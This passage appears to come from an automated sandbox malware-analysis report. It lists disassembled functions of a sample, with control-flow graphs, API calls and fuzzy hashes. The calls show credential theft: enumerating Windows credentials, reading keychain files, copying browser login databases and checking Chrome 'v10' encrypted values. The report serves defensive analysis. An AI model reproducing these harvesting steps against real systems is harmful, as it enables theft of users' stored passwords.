                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoSystemmemset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3558857096-0
                                                                                                                                                                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                                            Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                            • API String ID: 2263259095-3798722523
                                                                                                                                                                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                                            Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                            • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                                            Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                            • CopyFileW.KERNELBASE(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                                            • String ID: chp$v10
                                                                                                                                                                                                                                            • API String ID: 4165125987-2783969131
                                                                                                                                                                                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                                            Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                                            Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                            • String ID: bhv
                                                                                                                                                                                                                                            • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                                            Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 644 44671d-446726 641->644 643 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->643 653 4467ac-4467b7 __setusermatherr 643->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 643->654 646 446747-44674b 644->646 647 446728-44672d 644->647 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 652 446755-446758 648->652 650->642 651 44673d-446745 650->651 651->652 652->643 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 665 446834-446838 660->665 666 44683a-44683e 660->666 663 446845-44684b 661->663 664 446872-446877 661->664 669 446853-446864 GetStartupInfoW 663->669 670 44684d-446851 663->670 664->661 665->660 665->666 666->663 668 446840-446842 666->668 668->663 671 446866-44686a 669->671 672 446879-44687b 669->672 670->668 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2827331108-0
                                                                                                                                                                                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                                                            Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                            • wcschr.MSVCRT ref: 0040C324
